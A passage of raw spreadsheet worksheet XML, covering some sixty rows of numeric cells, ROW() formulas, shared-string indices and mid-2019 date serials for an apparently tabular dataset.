        <v>9978</v>
      </c>
      <c r="G13246" t="s">
        <v>23556</v>
      </c>
    </row>
    <row r="13247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13247">
        <f t="shared" si="206"/>
        <v>13246</v>
      </c>
      <c r="B13247">
        <v>3246</v>
      </c>
      <c r="C13247" t="s">
        <v>19637</v>
      </c>
      <c r="D13247" s="1">
        <v>43696</v>
      </c>
      <c r="E13247" t="s">
        <v>19896</v>
      </c>
      <c r="F13247" t="s">
        <v>10021</v>
      </c>
      <c r="G13247" t="s">
        <v>23557</v>
      </c>
    </row>
    <row r="13248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13248">
        <f t="shared" si="206"/>
        <v>13247</v>
      </c>
      <c r="B13248">
        <v>3247</v>
      </c>
      <c r="C13248" t="s">
        <v>19637</v>
      </c>
      <c r="D13248" s="1">
        <v>43699</v>
      </c>
      <c r="E13248" t="s">
        <v>19648</v>
      </c>
      <c r="F13248" t="s">
        <v>10021</v>
      </c>
      <c r="G13248" t="s">
        <v>23558</v>
      </c>
    </row>
    <row r="13249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13249">
        <f t="shared" si="206"/>
        <v>13248</v>
      </c>
      <c r="B13249">
        <v>3248</v>
      </c>
      <c r="C13249" t="s">
        <v>19637</v>
      </c>
      <c r="D13249" s="1">
        <v>43708</v>
      </c>
      <c r="E13249" t="s">
        <v>19640</v>
      </c>
      <c r="F13249" t="s">
        <v>10021</v>
      </c>
      <c r="G13249" t="s">
        <v>21552</v>
      </c>
    </row>
    <row r="13250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13250">
        <f t="shared" si="206"/>
        <v>13249</v>
      </c>
      <c r="B13250">
        <v>3249</v>
      </c>
      <c r="C13250" t="s">
        <v>19637</v>
      </c>
      <c r="D13250" s="1">
        <v>43686</v>
      </c>
      <c r="E13250" t="s">
        <v>19672</v>
      </c>
      <c r="F13250" t="s">
        <v>10021</v>
      </c>
      <c r="G13250" t="s">
        <v>23559</v>
      </c>
    </row>
    <row r="13251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13251">
        <f t="shared" ref="A13251:A13314" si="207">+ROW(A13250)</f>
        <v>13250</v>
      </c>
      <c r="B13251">
        <v>3250</v>
      </c>
      <c r="C13251" t="s">
        <v>19637</v>
      </c>
      <c r="D13251" s="1">
        <v>43678</v>
      </c>
      <c r="E13251" t="s">
        <v>21315</v>
      </c>
      <c r="F13251" t="s">
        <v>10526</v>
      </c>
      <c r="G13251" t="s">
        <v>23560</v>
      </c>
    </row>
    <row r="13252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13252">
        <f t="shared" si="207"/>
        <v>13251</v>
      </c>
      <c r="B13252">
        <v>3251</v>
      </c>
      <c r="C13252" t="s">
        <v>19637</v>
      </c>
      <c r="D13252" s="1">
        <v>43697</v>
      </c>
      <c r="E13252" t="s">
        <v>19672</v>
      </c>
      <c r="F13252" t="s">
        <v>10021</v>
      </c>
      <c r="G13252" t="s">
        <v>23561</v>
      </c>
    </row>
    <row r="13253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13253">
        <f t="shared" si="207"/>
        <v>13252</v>
      </c>
      <c r="B13253">
        <v>3252</v>
      </c>
      <c r="C13253" t="s">
        <v>19637</v>
      </c>
      <c r="D13253" s="1">
        <v>43682</v>
      </c>
      <c r="E13253" t="s">
        <v>19640</v>
      </c>
      <c r="F13253" t="s">
        <v>9975</v>
      </c>
      <c r="G13253" t="s">
        <v>23562</v>
      </c>
    </row>
    <row r="13254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13254">
        <f t="shared" si="207"/>
        <v>13253</v>
      </c>
      <c r="B13254">
        <v>3253</v>
      </c>
      <c r="C13254" t="s">
        <v>19637</v>
      </c>
      <c r="D13254" s="1">
        <v>43702</v>
      </c>
      <c r="E13254" t="s">
        <v>23563</v>
      </c>
      <c r="F13254" t="s">
        <v>10526</v>
      </c>
      <c r="G13254" t="s">
        <v>23564</v>
      </c>
    </row>
    <row r="13255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13255">
        <f t="shared" si="207"/>
        <v>13254</v>
      </c>
      <c r="B13255">
        <v>3254</v>
      </c>
      <c r="C13255" t="s">
        <v>19637</v>
      </c>
      <c r="D13255" s="1">
        <v>43690</v>
      </c>
      <c r="F13255" t="s">
        <v>9975</v>
      </c>
      <c r="G13255" t="s">
        <v>23565</v>
      </c>
    </row>
    <row r="13256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13256">
        <f t="shared" si="207"/>
        <v>13255</v>
      </c>
      <c r="B13256">
        <v>3255</v>
      </c>
      <c r="C13256" t="s">
        <v>19637</v>
      </c>
      <c r="D13256" s="1">
        <v>43708</v>
      </c>
      <c r="E13256" t="s">
        <v>19690</v>
      </c>
      <c r="F13256" t="s">
        <v>9978</v>
      </c>
      <c r="G13256" t="s">
        <v>23566</v>
      </c>
    </row>
    <row r="13257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13257">
        <f t="shared" si="207"/>
        <v>13256</v>
      </c>
      <c r="B13257">
        <v>3256</v>
      </c>
      <c r="C13257" t="s">
        <v>19637</v>
      </c>
      <c r="D13257" s="1">
        <v>43692</v>
      </c>
      <c r="F13257" t="s">
        <v>10526</v>
      </c>
      <c r="G13257" t="s">
        <v>23567</v>
      </c>
    </row>
    <row r="13258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13258">
        <f t="shared" si="207"/>
        <v>13257</v>
      </c>
      <c r="B13258">
        <v>3257</v>
      </c>
      <c r="C13258" t="s">
        <v>19637</v>
      </c>
      <c r="D13258" s="1">
        <v>43687</v>
      </c>
      <c r="E13258" t="s">
        <v>19640</v>
      </c>
      <c r="F13258" t="s">
        <v>10021</v>
      </c>
      <c r="G13258" t="s">
        <v>23568</v>
      </c>
    </row>
    <row r="13259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13259">
        <f t="shared" si="207"/>
        <v>13258</v>
      </c>
      <c r="B13259">
        <v>3258</v>
      </c>
      <c r="C13259" t="s">
        <v>19637</v>
      </c>
      <c r="D13259" s="1">
        <v>43700</v>
      </c>
      <c r="E13259" t="s">
        <v>19650</v>
      </c>
      <c r="F13259" t="s">
        <v>10021</v>
      </c>
      <c r="G13259" t="s">
        <v>23569</v>
      </c>
    </row>
    <row r="13260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13260">
        <f t="shared" si="207"/>
        <v>13259</v>
      </c>
      <c r="B13260">
        <v>3259</v>
      </c>
      <c r="C13260" t="s">
        <v>19637</v>
      </c>
      <c r="D13260" s="1">
        <v>43699</v>
      </c>
      <c r="E13260" t="s">
        <v>23570</v>
      </c>
      <c r="F13260" t="s">
        <v>10526</v>
      </c>
      <c r="G13260" t="s">
        <v>23571</v>
      </c>
    </row>
    <row r="13261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13261">
        <f t="shared" si="207"/>
        <v>13260</v>
      </c>
      <c r="B13261">
        <v>3260</v>
      </c>
      <c r="C13261" t="s">
        <v>19637</v>
      </c>
      <c r="D13261" s="1">
        <v>43688</v>
      </c>
      <c r="E13261" t="s">
        <v>20005</v>
      </c>
      <c r="F13261" t="s">
        <v>9975</v>
      </c>
      <c r="G13261" t="s">
        <v>23572</v>
      </c>
    </row>
    <row r="13262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13262">
        <f t="shared" si="207"/>
        <v>13261</v>
      </c>
      <c r="B13262">
        <v>3261</v>
      </c>
      <c r="C13262" t="s">
        <v>19637</v>
      </c>
      <c r="D13262" s="1">
        <v>43683</v>
      </c>
      <c r="E13262" t="s">
        <v>20133</v>
      </c>
      <c r="F13262" t="s">
        <v>9978</v>
      </c>
      <c r="G13262" t="s">
        <v>23573</v>
      </c>
    </row>
    <row r="13263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13263">
        <f t="shared" si="207"/>
        <v>13262</v>
      </c>
      <c r="B13263">
        <v>3262</v>
      </c>
      <c r="C13263" t="s">
        <v>19637</v>
      </c>
      <c r="D13263" s="1">
        <v>43677</v>
      </c>
      <c r="E13263" t="s">
        <v>19919</v>
      </c>
      <c r="F13263" t="s">
        <v>10526</v>
      </c>
      <c r="G13263" t="s">
        <v>23574</v>
      </c>
    </row>
    <row r="13264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13264">
        <f t="shared" si="207"/>
        <v>13263</v>
      </c>
      <c r="B13264">
        <v>3263</v>
      </c>
      <c r="C13264" t="s">
        <v>19637</v>
      </c>
      <c r="D13264" s="1">
        <v>43702</v>
      </c>
      <c r="E13264" t="s">
        <v>19643</v>
      </c>
      <c r="F13264" t="s">
        <v>10021</v>
      </c>
      <c r="G13264" t="s">
        <v>23575</v>
      </c>
    </row>
    <row r="13265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13265">
        <f t="shared" si="207"/>
        <v>13264</v>
      </c>
      <c r="B13265">
        <v>3264</v>
      </c>
      <c r="C13265" t="s">
        <v>19637</v>
      </c>
      <c r="D13265" s="1">
        <v>43696</v>
      </c>
      <c r="E13265" t="s">
        <v>23576</v>
      </c>
      <c r="F13265" t="s">
        <v>9975</v>
      </c>
      <c r="G13265" t="s">
        <v>23577</v>
      </c>
    </row>
    <row r="13266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13266">
        <f t="shared" si="207"/>
        <v>13265</v>
      </c>
      <c r="B13266">
        <v>3265</v>
      </c>
      <c r="C13266" t="s">
        <v>19637</v>
      </c>
      <c r="D13266" s="1">
        <v>43700</v>
      </c>
      <c r="E13266" t="s">
        <v>19640</v>
      </c>
      <c r="F13266" t="s">
        <v>10021</v>
      </c>
      <c r="G13266" t="s">
        <v>23578</v>
      </c>
    </row>
    <row r="13267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13267">
        <f t="shared" si="207"/>
        <v>13266</v>
      </c>
      <c r="B13267">
        <v>3266</v>
      </c>
      <c r="C13267" t="s">
        <v>19637</v>
      </c>
      <c r="D13267" s="1">
        <v>43687</v>
      </c>
      <c r="E13267" t="s">
        <v>19640</v>
      </c>
      <c r="F13267" t="s">
        <v>10021</v>
      </c>
      <c r="G13267" t="s">
        <v>23579</v>
      </c>
    </row>
    <row r="13268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13268">
        <f t="shared" si="207"/>
        <v>13267</v>
      </c>
      <c r="B13268">
        <v>3267</v>
      </c>
      <c r="C13268" t="s">
        <v>19637</v>
      </c>
      <c r="D13268" s="1">
        <v>43683</v>
      </c>
      <c r="E13268" t="s">
        <v>19776</v>
      </c>
      <c r="F13268" t="s">
        <v>10021</v>
      </c>
      <c r="G13268" t="s">
        <v>23580</v>
      </c>
    </row>
    <row r="13269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13269">
        <f t="shared" si="207"/>
        <v>13268</v>
      </c>
      <c r="B13269">
        <v>3268</v>
      </c>
      <c r="C13269" t="s">
        <v>19637</v>
      </c>
      <c r="D13269" s="1">
        <v>43699</v>
      </c>
      <c r="E13269" t="s">
        <v>19640</v>
      </c>
      <c r="F13269" t="s">
        <v>10021</v>
      </c>
      <c r="G13269" t="s">
        <v>23581</v>
      </c>
    </row>
    <row r="13270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13270">
        <f t="shared" si="207"/>
        <v>13269</v>
      </c>
      <c r="B13270">
        <v>3269</v>
      </c>
      <c r="C13270" t="s">
        <v>19637</v>
      </c>
      <c r="D13270" s="1">
        <v>43678</v>
      </c>
      <c r="E13270" t="s">
        <v>23582</v>
      </c>
      <c r="F13270" t="s">
        <v>10526</v>
      </c>
      <c r="G13270" t="s">
        <v>23583</v>
      </c>
    </row>
    <row r="13271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13271">
        <f t="shared" si="207"/>
        <v>13270</v>
      </c>
      <c r="B13271">
        <v>3270</v>
      </c>
      <c r="C13271" t="s">
        <v>19637</v>
      </c>
      <c r="D13271" s="1">
        <v>43708</v>
      </c>
      <c r="E13271" t="s">
        <v>21312</v>
      </c>
      <c r="F13271" t="s">
        <v>10021</v>
      </c>
      <c r="G13271" t="s">
        <v>23584</v>
      </c>
    </row>
    <row r="13272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13272">
        <f t="shared" si="207"/>
        <v>13271</v>
      </c>
      <c r="B13272">
        <v>3271</v>
      </c>
      <c r="C13272" t="s">
        <v>19637</v>
      </c>
      <c r="D13272" s="1">
        <v>43677</v>
      </c>
      <c r="E13272" t="s">
        <v>20677</v>
      </c>
      <c r="F13272" t="s">
        <v>10526</v>
      </c>
      <c r="G13272" t="s">
        <v>23585</v>
      </c>
    </row>
    <row r="13273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13273">
        <f t="shared" si="207"/>
        <v>13272</v>
      </c>
      <c r="B13273">
        <v>3272</v>
      </c>
      <c r="C13273" t="s">
        <v>19637</v>
      </c>
      <c r="D13273" s="1">
        <v>43706</v>
      </c>
      <c r="E13273" t="s">
        <v>19650</v>
      </c>
      <c r="F13273" t="s">
        <v>10021</v>
      </c>
      <c r="G13273" t="s">
        <v>23586</v>
      </c>
    </row>
    <row r="13274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13274">
        <f t="shared" si="207"/>
        <v>13273</v>
      </c>
      <c r="B13274">
        <v>3273</v>
      </c>
      <c r="C13274" t="s">
        <v>19637</v>
      </c>
      <c r="D13274" s="1">
        <v>43697</v>
      </c>
      <c r="E13274" t="s">
        <v>19640</v>
      </c>
      <c r="F13274" t="s">
        <v>9975</v>
      </c>
      <c r="G13274" t="s">
        <v>23587</v>
      </c>
    </row>
    <row r="13275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13275">
        <f t="shared" si="207"/>
        <v>13274</v>
      </c>
      <c r="B13275">
        <v>3274</v>
      </c>
      <c r="C13275" t="s">
        <v>19637</v>
      </c>
      <c r="D13275" s="1">
        <v>43705</v>
      </c>
      <c r="E13275" t="s">
        <v>20696</v>
      </c>
      <c r="F13275" t="s">
        <v>9975</v>
      </c>
      <c r="G13275" t="s">
        <v>23588</v>
      </c>
    </row>
    <row r="13276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13276">
        <f t="shared" si="207"/>
        <v>13275</v>
      </c>
      <c r="B13276">
        <v>3275</v>
      </c>
      <c r="C13276" t="s">
        <v>19637</v>
      </c>
      <c r="D13276" s="1">
        <v>43706</v>
      </c>
      <c r="E13276" t="s">
        <v>19650</v>
      </c>
      <c r="F13276" t="s">
        <v>10021</v>
      </c>
      <c r="G13276" t="s">
        <v>23589</v>
      </c>
    </row>
    <row r="13277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13277">
        <f t="shared" si="207"/>
        <v>13276</v>
      </c>
      <c r="B13277">
        <v>3276</v>
      </c>
      <c r="C13277" t="s">
        <v>19637</v>
      </c>
      <c r="D13277" s="1">
        <v>43686</v>
      </c>
      <c r="E13277" t="s">
        <v>23590</v>
      </c>
      <c r="F13277" t="s">
        <v>9975</v>
      </c>
      <c r="G13277" t="s">
        <v>23591</v>
      </c>
    </row>
    <row r="13278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13278">
        <f t="shared" si="207"/>
        <v>13277</v>
      </c>
      <c r="B13278">
        <v>3277</v>
      </c>
      <c r="C13278" t="s">
        <v>19637</v>
      </c>
      <c r="D13278" s="1">
        <v>43683</v>
      </c>
      <c r="E13278" t="s">
        <v>20995</v>
      </c>
      <c r="F13278" t="s">
        <v>9975</v>
      </c>
      <c r="G13278" t="s">
        <v>23592</v>
      </c>
    </row>
    <row r="13279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13279">
        <f t="shared" si="207"/>
        <v>13278</v>
      </c>
      <c r="B13279">
        <v>3278</v>
      </c>
      <c r="C13279" t="s">
        <v>19637</v>
      </c>
      <c r="D13279" s="1">
        <v>43700</v>
      </c>
      <c r="E13279" t="s">
        <v>20250</v>
      </c>
      <c r="F13279" t="s">
        <v>10021</v>
      </c>
      <c r="G13279" t="s">
        <v>23593</v>
      </c>
    </row>
    <row r="13280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13280">
        <f t="shared" si="207"/>
        <v>13279</v>
      </c>
      <c r="B13280">
        <v>3279</v>
      </c>
      <c r="C13280" t="s">
        <v>19637</v>
      </c>
      <c r="D13280" s="1">
        <v>43678</v>
      </c>
      <c r="E13280" t="s">
        <v>19796</v>
      </c>
      <c r="F13280" t="s">
        <v>10021</v>
      </c>
      <c r="G13280" t="s">
        <v>23594</v>
      </c>
    </row>
    <row r="13281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13281">
        <f t="shared" si="207"/>
        <v>13280</v>
      </c>
      <c r="B13281">
        <v>3280</v>
      </c>
      <c r="C13281" t="s">
        <v>19637</v>
      </c>
      <c r="D13281" s="1">
        <v>43695</v>
      </c>
      <c r="E13281" t="s">
        <v>20187</v>
      </c>
      <c r="F13281" t="s">
        <v>9975</v>
      </c>
      <c r="G13281" t="s">
        <v>23595</v>
      </c>
    </row>
    <row r="13282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13282">
        <f t="shared" si="207"/>
        <v>13281</v>
      </c>
      <c r="B13282">
        <v>3281</v>
      </c>
      <c r="C13282" t="s">
        <v>19637</v>
      </c>
      <c r="D13282" s="1">
        <v>43683</v>
      </c>
      <c r="E13282" t="s">
        <v>19849</v>
      </c>
      <c r="F13282" t="s">
        <v>10021</v>
      </c>
      <c r="G13282" t="s">
        <v>23596</v>
      </c>
    </row>
    <row r="13283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13283">
        <f t="shared" si="207"/>
        <v>13282</v>
      </c>
      <c r="B13283">
        <v>3282</v>
      </c>
      <c r="C13283" t="s">
        <v>19637</v>
      </c>
      <c r="D13283" s="1">
        <v>43707</v>
      </c>
      <c r="E13283" t="s">
        <v>19638</v>
      </c>
      <c r="F13283" t="s">
        <v>10021</v>
      </c>
      <c r="G13283" t="s">
        <v>23597</v>
      </c>
    </row>
    <row r="13284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13284">
        <f t="shared" si="207"/>
        <v>13283</v>
      </c>
      <c r="B13284">
        <v>3283</v>
      </c>
      <c r="C13284" t="s">
        <v>19637</v>
      </c>
      <c r="D13284" s="1">
        <v>43685</v>
      </c>
      <c r="E13284" t="s">
        <v>19640</v>
      </c>
      <c r="F13284" t="s">
        <v>9975</v>
      </c>
      <c r="G13284" t="s">
        <v>23598</v>
      </c>
    </row>
    <row r="13285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13285">
        <f t="shared" si="207"/>
        <v>13284</v>
      </c>
      <c r="B13285">
        <v>3284</v>
      </c>
      <c r="C13285" t="s">
        <v>19637</v>
      </c>
      <c r="D13285" s="1">
        <v>43696</v>
      </c>
      <c r="E13285" t="s">
        <v>19977</v>
      </c>
      <c r="F13285" t="s">
        <v>10021</v>
      </c>
      <c r="G13285" t="s">
        <v>23599</v>
      </c>
    </row>
    <row r="13286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13286">
        <f t="shared" si="207"/>
        <v>13285</v>
      </c>
      <c r="B13286">
        <v>3285</v>
      </c>
      <c r="C13286" t="s">
        <v>19637</v>
      </c>
      <c r="D13286" s="1">
        <v>43682</v>
      </c>
      <c r="E13286" t="s">
        <v>19648</v>
      </c>
      <c r="F13286" t="s">
        <v>10021</v>
      </c>
      <c r="G13286" t="s">
        <v>23600</v>
      </c>
    </row>
    <row r="13287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13287">
        <f t="shared" si="207"/>
        <v>13286</v>
      </c>
      <c r="B13287">
        <v>3286</v>
      </c>
      <c r="C13287" t="s">
        <v>19637</v>
      </c>
      <c r="D13287" s="1">
        <v>43699</v>
      </c>
      <c r="E13287" t="s">
        <v>19640</v>
      </c>
      <c r="F13287" t="s">
        <v>10021</v>
      </c>
      <c r="G13287" t="s">
        <v>23601</v>
      </c>
    </row>
    <row r="13288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13288">
        <f t="shared" si="207"/>
        <v>13287</v>
      </c>
      <c r="B13288">
        <v>3287</v>
      </c>
      <c r="C13288" t="s">
        <v>19637</v>
      </c>
      <c r="D13288" s="1">
        <v>43708</v>
      </c>
      <c r="E13288" t="s">
        <v>19680</v>
      </c>
      <c r="F13288" t="s">
        <v>10021</v>
      </c>
      <c r="G13288" t="s">
        <v>23602</v>
      </c>
    </row>
    <row r="13289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13289">
        <f t="shared" si="207"/>
        <v>13288</v>
      </c>
      <c r="B13289">
        <v>3288</v>
      </c>
      <c r="C13289" t="s">
        <v>19637</v>
      </c>
      <c r="D13289" s="1">
        <v>43707</v>
      </c>
      <c r="E13289" t="s">
        <v>19750</v>
      </c>
      <c r="F13289" t="s">
        <v>9978</v>
      </c>
      <c r="G13289" t="s">
        <v>23603</v>
      </c>
    </row>
    <row r="13290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13290">
        <f t="shared" si="207"/>
        <v>13289</v>
      </c>
      <c r="B13290">
        <v>3289</v>
      </c>
      <c r="C13290" t="s">
        <v>19637</v>
      </c>
      <c r="D13290" s="1">
        <v>43692</v>
      </c>
      <c r="F13290" t="s">
        <v>10526</v>
      </c>
      <c r="G13290" t="s">
        <v>23604</v>
      </c>
    </row>
    <row r="13291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13291">
        <f t="shared" si="207"/>
        <v>13290</v>
      </c>
      <c r="B13291">
        <v>3290</v>
      </c>
      <c r="C13291" t="s">
        <v>19637</v>
      </c>
      <c r="D13291" s="1">
        <v>43686</v>
      </c>
      <c r="E13291" t="s">
        <v>22539</v>
      </c>
      <c r="F13291" t="s">
        <v>10021</v>
      </c>
      <c r="G13291" t="s">
        <v>23605</v>
      </c>
    </row>
    <row r="13292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13292">
        <f t="shared" si="207"/>
        <v>13291</v>
      </c>
      <c r="B13292">
        <v>3291</v>
      </c>
      <c r="C13292" t="s">
        <v>19637</v>
      </c>
      <c r="D13292" s="1">
        <v>43678</v>
      </c>
      <c r="E13292" t="s">
        <v>21389</v>
      </c>
      <c r="F13292" t="s">
        <v>9975</v>
      </c>
      <c r="G13292" t="s">
        <v>23606</v>
      </c>
    </row>
    <row r="13293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13293">
        <f t="shared" si="207"/>
        <v>13292</v>
      </c>
      <c r="B13293">
        <v>3292</v>
      </c>
      <c r="C13293" t="s">
        <v>19637</v>
      </c>
      <c r="D13293" s="1">
        <v>43696</v>
      </c>
      <c r="E13293" t="s">
        <v>20421</v>
      </c>
      <c r="F13293" t="s">
        <v>10021</v>
      </c>
      <c r="G13293" t="s">
        <v>23607</v>
      </c>
    </row>
    <row r="13294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13294">
        <f t="shared" si="207"/>
        <v>13293</v>
      </c>
      <c r="B13294">
        <v>3293</v>
      </c>
      <c r="C13294" t="s">
        <v>19637</v>
      </c>
      <c r="D13294" s="1">
        <v>43682</v>
      </c>
      <c r="E13294" t="s">
        <v>20694</v>
      </c>
      <c r="F13294" t="s">
        <v>10526</v>
      </c>
      <c r="G13294" t="s">
        <v>23608</v>
      </c>
    </row>
    <row r="13295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13295">
        <f t="shared" si="207"/>
        <v>13294</v>
      </c>
      <c r="B13295">
        <v>3294</v>
      </c>
      <c r="C13295" t="s">
        <v>19637</v>
      </c>
      <c r="D13295" s="1">
        <v>43705</v>
      </c>
      <c r="E13295" t="s">
        <v>19640</v>
      </c>
      <c r="F13295" t="s">
        <v>9975</v>
      </c>
      <c r="G13295" t="s">
        <v>23609</v>
      </c>
    </row>
    <row r="13296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13296">
        <f t="shared" si="207"/>
        <v>13295</v>
      </c>
      <c r="B13296">
        <v>3295</v>
      </c>
      <c r="C13296" t="s">
        <v>19637</v>
      </c>
      <c r="D13296" s="1">
        <v>43707</v>
      </c>
      <c r="E13296" t="s">
        <v>19648</v>
      </c>
      <c r="F13296" t="s">
        <v>10021</v>
      </c>
      <c r="G13296" t="s">
        <v>23610</v>
      </c>
    </row>
    <row r="13297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13297">
        <f t="shared" si="207"/>
        <v>13296</v>
      </c>
      <c r="B13297">
        <v>3296</v>
      </c>
      <c r="C13297" t="s">
        <v>19637</v>
      </c>
      <c r="D13297" s="1">
        <v>43683</v>
      </c>
      <c r="E13297" t="s">
        <v>19640</v>
      </c>
      <c r="F13297" t="s">
        <v>10021</v>
      </c>
      <c r="G13297" t="s">
        <v>23611</v>
      </c>
    </row>
    <row r="13298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13298">
        <f t="shared" si="207"/>
        <v>13297</v>
      </c>
      <c r="B13298">
        <v>3297</v>
      </c>
      <c r="C13298" t="s">
        <v>19637</v>
      </c>
      <c r="D13298" s="1">
        <v>43691</v>
      </c>
      <c r="E13298" t="s">
        <v>23612</v>
      </c>
      <c r="F13298" t="s">
        <v>10021</v>
      </c>
      <c r="G13298" t="s">
        <v>23613</v>
      </c>
    </row>
    <row r="13299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13299">
        <f t="shared" si="207"/>
        <v>13298</v>
      </c>
      <c r="B13299">
        <v>3298</v>
      </c>
      <c r="C13299" t="s">
        <v>19637</v>
      </c>
      <c r="D13299" s="1">
        <v>43682</v>
      </c>
      <c r="F13299" t="s">
        <v>10526</v>
      </c>
      <c r="G13299" t="s">
        <v>22076</v>
      </c>
    </row>
    <row r="13300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13300">
        <f t="shared" si="207"/>
        <v>13299</v>
      </c>
      <c r="B13300">
        <v>3299</v>
      </c>
      <c r="C13300" t="s">
        <v>19637</v>
      </c>
      <c r="D13300" s="1">
        <v>43703</v>
      </c>
      <c r="E13300" t="s">
        <v>19966</v>
      </c>
      <c r="F13300" t="s">
        <v>9978</v>
      </c>
      <c r="G13300" t="s">
        <v>23614</v>
      </c>
    </row>
    <row r="13301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13301">
        <f t="shared" si="207"/>
        <v>13300</v>
      </c>
      <c r="B13301">
        <v>3300</v>
      </c>
      <c r="C13301" t="s">
        <v>19637</v>
      </c>
      <c r="D13301" s="1">
        <v>43689</v>
      </c>
      <c r="E13301" t="s">
        <v>20034</v>
      </c>
      <c r="F13301" t="s">
        <v>10021</v>
      </c>
      <c r="G13301" t="s">
        <v>23615</v>
      </c>
    </row>
    <row r="13302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13302">
        <f t="shared" si="207"/>
        <v>13301</v>
      </c>
      <c r="B13302">
        <v>3301</v>
      </c>
      <c r="C13302" t="s">
        <v>19637</v>
      </c>
      <c r="D13302" s="1">
        <v>43677</v>
      </c>
      <c r="E13302" t="s">
        <v>21415</v>
      </c>
      <c r="F13302" t="s">
        <v>10021</v>
      </c>
      <c r="G13302" t="s">
        <v>23616</v>
      </c>
    </row>
    <row r="13303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13303">
        <f t="shared" si="207"/>
        <v>13302</v>
      </c>
      <c r="B13303">
        <v>3302</v>
      </c>
      <c r="C13303" t="s">
        <v>19637</v>
      </c>
      <c r="D13303" s="1">
        <v>43703</v>
      </c>
      <c r="E13303" t="s">
        <v>23011</v>
      </c>
      <c r="F13303" t="s">
        <v>10526</v>
      </c>
      <c r="G13303" t="s">
        <v>23617</v>
      </c>
    </row>
    <row r="13304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13304">
        <f t="shared" si="207"/>
        <v>13303</v>
      </c>
      <c r="B13304">
        <v>3303</v>
      </c>
      <c r="C13304" t="s">
        <v>19637</v>
      </c>
      <c r="D13304" s="1">
        <v>43691</v>
      </c>
      <c r="E13304" t="s">
        <v>19640</v>
      </c>
      <c r="F13304" t="s">
        <v>9975</v>
      </c>
      <c r="G13304" t="s">
        <v>23618</v>
      </c>
    </row>
    <row r="13305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13305">
        <f t="shared" si="207"/>
        <v>13304</v>
      </c>
      <c r="B13305">
        <v>3304</v>
      </c>
      <c r="C13305" t="s">
        <v>19637</v>
      </c>
      <c r="D13305" s="1">
        <v>43678</v>
      </c>
      <c r="E13305" t="s">
        <v>23619</v>
      </c>
      <c r="F13305" t="s">
        <v>10526</v>
      </c>
      <c r="G13305" t="s">
        <v>23620</v>
      </c>
    </row>
    <row r="13306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13306">
        <f t="shared" si="207"/>
        <v>13305</v>
      </c>
      <c r="B13306">
        <v>3305</v>
      </c>
      <c r="C13306" t="s">
        <v>19637</v>
      </c>
      <c r="D13306" s="1">
        <v>43691</v>
      </c>
      <c r="F13306" t="s">
        <v>9978</v>
      </c>
      <c r="G13306" t="s">
        <v>23621</v>
      </c>
    </row>
    <row r="13307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13307">
        <f t="shared" si="207"/>
        <v>13306</v>
      </c>
      <c r="B13307">
        <v>3306</v>
      </c>
      <c r="C13307" t="s">
        <v>19637</v>
      </c>
      <c r="D13307" s="1">
        <v>43695</v>
      </c>
      <c r="E13307" t="s">
        <v>19917</v>
      </c>
      <c r="F13307" t="s">
        <v>9975</v>
      </c>
      <c r="G13307" t="s">
        <v>23622</v>
      </c>
    </row>
    <row r="13308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13308">
        <f t="shared" si="207"/>
        <v>13307</v>
